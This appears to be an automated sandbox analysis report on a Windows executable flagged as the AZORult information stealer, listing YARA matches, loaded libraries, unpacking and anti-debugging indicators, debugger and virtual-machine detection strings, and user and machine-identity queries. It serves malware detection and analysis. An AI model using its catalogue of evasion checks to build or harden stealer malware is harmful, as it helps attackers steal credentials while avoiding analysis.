Source: 0.2.UoktqWamLR.exe.4a70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 0.2.UoktqWamLR.exe.4a70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000000.00000003.2147061122.000000000077F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000000.00000003.2099553622.000000000077E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000000.00000003.2146906626.000000000076E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000000.00000003.2099437786.000000000079B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000000.00000003.2099388481.000000000076B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000000.00000003.2099455436.000000000077E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04

Source: UoktqWamLR.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/0@2/1

Source: C:\Users\user\Desktop\UoktqWamLR.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Mutant created: \Sessions\1\BaseNamedObjects\AFA7A44E-69414907-A7566F0F-BFAE66A7-2E92F6D4A

Source: UoktqWamLR.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\UoktqWamLR.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: UoktqWamLR.exe

ReversingLabs: Detection: 63%

Source: unknown	Process created: C:\Users\user\Desktop\UoktqWamLR.exe "C:\Users\user\Desktop\UoktqWamLR.exe"
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Process created: C:\Users\user\Desktop\UoktqWamLR.exe "C:\Users\user\Desktop\UoktqWamLR.exe"
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Process created: C:\Users\user\Desktop\UoktqWamLR.exe "C:\Users\user\Desktop\UoktqWamLR.exe"	Jump to behavior

Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: vb6de.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: vb6de.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: crtdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Section loaded: winrnr.dll	Jump to behavior

Source: C:\Users\user\Desktop\UoktqWamLR.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0BE35204-8F91-11CE-9DE3-00AA004BB851}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: UoktqWamLR.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: UoktqWamLR.exe

Static file information: File size 1069056 > 1048576

Source: UoktqWamLR.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x101000

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\UoktqWamLR.exe

Unpacked PE file: 2.2.UoktqWamLR.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs CODE:ER;DATA:W;BSS:W;.idata:W;.reloc:R;

Source: C:\Users\user\Desktop\UoktqWamLR.exe

Code function: 2_2_00417216 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

2_2_00417216

Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_0040ACC2 pushfd ; retf	0_2_0040ACE5
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_0040ACFE pushfd ; retf	0_2_0040AD35
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_0040ACAC pushad ; retf	0_2_0040ACAD
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_00409B84 push esp; retf 0040h	0_2_00409B8D
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_02352255 push esi; ret	0_2_02352261
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_02352EBA push edx; ret	0_2_02352EBC
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_02351B73 push ecx; iretd	0_2_02351B91
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_02354C26 push esi; iretd	0_2_02354C27
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_0041A068 push 0041A08Eh; ret	2_2_0041A086
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_0041A02C push 0041A05Ch; ret	2_2_0041A054
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_0040B164 push 0040B190h; ret	2_2_0040B188
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_0040B12C push 0040B158h; ret	2_2_0040B150
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_0040C136 push 0040C164h; ret	2_2_0040C15C
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_0040C138 push 0040C164h; ret	2_2_0040C15C
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_0040813C push 00408174h; ret	2_2_0040816C
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_004171E8 push 00417214h; ret	2_2_0041720C
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_0040E1A4 push 0040E1D0h; ret	2_2_0040E1C8
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_0040B1B8 push 0040B1E4h; ret	2_2_0040B1DC
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_0040E25A push 0040E288h; ret	2_2_0040E280
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_0040E25C push 0040E288h; ret	2_2_0040E280
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_0040D378 push 0040D3A8h; ret	2_2_0040D3A0
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_0040D37C push 0040D3A8h; ret	2_2_0040D3A0
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_0040B3D8 push 0040B414h; ret	2_2_0040B40C
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_0040B3DC push 0040B414h; ret	2_2_0040B40C
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_004183E4 push 00418410h; ret	2_2_00418408
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_0040B420 push 0040B44Ch; ret	2_2_0040B444
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_00415420 push 00415640h; ret	2_2_00415638
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_00417424 push 00417450h; ret	2_2_00417448
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_0041B488 push eax; retf 0041h	2_2_0041B489
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_00412504 push 00412530h; ret	2_2_00412528
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_004055C0 push 00405626h; ret	2_2_0040561E

Source: UoktqWamLR.exe

Static PE information: section name: .text entropy: 7.8724464732051125

Source: C:\Users\user\Desktop\UoktqWamLR.exe

2_2_00417216

Source: C:\Users\user\Desktop\UoktqWamLR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: UoktqWamLR.exe	Binary or memory string: OLLYDBG.EXE
Source: UoktqWamLR.exe	Binary or memory string: X64DBG.EXE
Source: UoktqWamLR.exe	Binary or memory string: WINDBG.EXE
Source: UoktqWamLR.exe, 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: OLLYDBG.EXEX32DBG.EXEWINDBG.EXEX64DBG.EXEX96DBG.EXEIMMUNITYDEBUGGER.EXE_

Source: C:\Users\user\Desktop\UoktqWamLR.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_00413030 FindFirstFileW,FindNextFileW,FindClose,	2_2_00413030
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_0041160C FindFirstFileW,FindNextFileW,FindClose,	2_2_0041160C
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	2_2_00413F58
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,	2_2_004119A8
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_004119AC FindFirstFileW,FindNextFileW,FindClose,	2_2_004119AC
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,	2_2_00412D6C
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	2_2_00413F58

Source: C:\Users\user\Desktop\UoktqWamLR.exe

Code function: 2_2_00415E40 GetSystemInfo,

2_2_00415E40

Source: UoktqWamLR.exe, 00000002.00000002.2192999900.00000000006B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW-
Source: UoktqWamLR.exe, 00000002.00000002.2192999900.0000000000670000.00000004.00000020.00020000.00000000.sdmp, UoktqWamLR.exe, 00000002.00000002.2192999900.00000000006B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\UoktqWamLR.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\UoktqWamLR.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Thread information set: HideFromDebugger			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\UoktqWamLR.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Open window title or class name: windbgframeclass

Source: C:\Users\user\Desktop\UoktqWamLR.exe	Process queried: DebugFlags			Jump to behavior
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\UoktqWamLR.exe

2_2_00417216

Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_004BCC4B mov eax, dword ptr fs:[00000030h]	0_2_004BCC4B
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_004A746E mov eax, dword ptr fs:[00000030h]	0_2_004A746E
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_004A74CB mov eax, dword ptr fs:[00000030h]	0_2_004A74CB
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_004A74E0 mov eax, dword ptr fs:[00000030h]	0_2_004A74E0
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_004A74F4 mov eax, dword ptr fs:[00000030h]	0_2_004A74F4
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_004BCC84 mov eax, dword ptr fs:[00000030h]	0_2_004BCC84
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_004BCCBC mov eax, dword ptr fs:[00000030h]	0_2_004BCCBC
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_004BCD25 mov eax, dword ptr fs:[00000030h]	0_2_004BCD25
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_004BCD8F mov eax, dword ptr fs:[00000030h]	0_2_004BCD8F
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_004BCE4C mov eax, dword ptr fs:[00000030h]	0_2_004BCE4C
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_004BCB45 mov eax, dword ptr fs:[00000030h]	0_2_004BCB45
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_004A77C9 mov eax, dword ptr fs:[00000030h]	0_2_004A77C9
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_004BCB9B mov eax, dword ptr fs:[00000030h]	0_2_004BCB9B
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_02353113 mov eax, dword ptr fs:[00000030h]	0_2_02353113
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_02355E3F mov eax, dword ptr fs:[00000030h]	0_2_02355E3F
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_023536E4 mov eax, dword ptr fs:[00000030h]	0_2_023536E4
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_02357735 mov eax, dword ptr fs:[00000030h]	0_2_02357735
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_023577B7 mov eax, dword ptr fs:[00000030h]	0_2_023577B7
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_023573F4 mov eax, dword ptr fs:[00000030h]	0_2_023573F4
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_02356834 mov eax, dword ptr fs:[00000030h]	0_2_02356834
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_02357827 mov eax, dword ptr fs:[00000030h]	0_2_02357827
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_023578F3 mov eax, dword ptr fs:[00000030h]	0_2_023578F3
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_02357D3D mov ecx, dword ptr fs:[00000030h]	0_2_02357D3D
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_023501AE mov eax, dword ptr fs:[00000030h]	0_2_023501AE
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_023575A8 mov eax, dword ptr fs:[00000030h]	0_2_023575A8
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 0_2_023575E1 mov eax, dword ptr fs:[00000030h]	0_2_023575E1
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_00407AF0 mov eax, dword ptr fs:[00000030h]	2_2_00407AF0

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\UoktqWamLR.exe

Section loaded: NULL target: C:\Users\user\Desktop\UoktqWamLR.exe protection: execute and read and write

Jump to behavior

Source: C:\Users\user\Desktop\UoktqWamLR.exe

Process created: C:\Users\user\Desktop\UoktqWamLR.exe "C:\Users\user\Desktop\UoktqWamLR.exe"

Jump to behavior

Source: C:\Users\user\Desktop\UoktqWamLR.exe

Code function: GetLocaleInfoA,

2_2_00404BA8

Source: C:\Users\user\Desktop\UoktqWamLR.exe

Code function: 2_2_004065F0 GetUserNameW,

2_2_004065F0

Source: C:\Users\user\Desktop\UoktqWamLR.exe

Code function: 2_2_00404C71 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,

2_2_00404C71

Source: C:\Users\user\Desktop\UoktqWamLR.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: UoktqWamLR.exe

Binary or memory string: ollyDbg.exe

Stealing of Sensitive Information

Detected AZORult Info Stealer

Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_004186C4		2_2_004186C4
Source: C:\Users\user\Desktop\UoktqWamLR.exe	Code function: 2_2_004186C4		2_2_004186C4

Yara detected Azorult

Source: Yara match	File source: 0.2.UoktqWamLR.exe.4a70000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UoktqWamLR.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UoktqWamLR.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.UoktqWamLR.exe.4a70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2150159771.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2147061122.000000000077F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2099553622.000000000077E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2146906626.000000000076E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2099437786.000000000079B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2099388481.000000000076B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2099455436.000000000077E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UoktqWamLR.exe PID: 4952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UoktqWamLR.exe PID: 6164, type: MEMORYSTR

Yara detected Azorult Info Stealer

Source: Yara match	File source: 0.2.UoktqWamLR.exe.4a70000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UoktqWamLR.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UoktqWamLR.exe.400000.0.raw.unpack, type: UNPACKEDPE
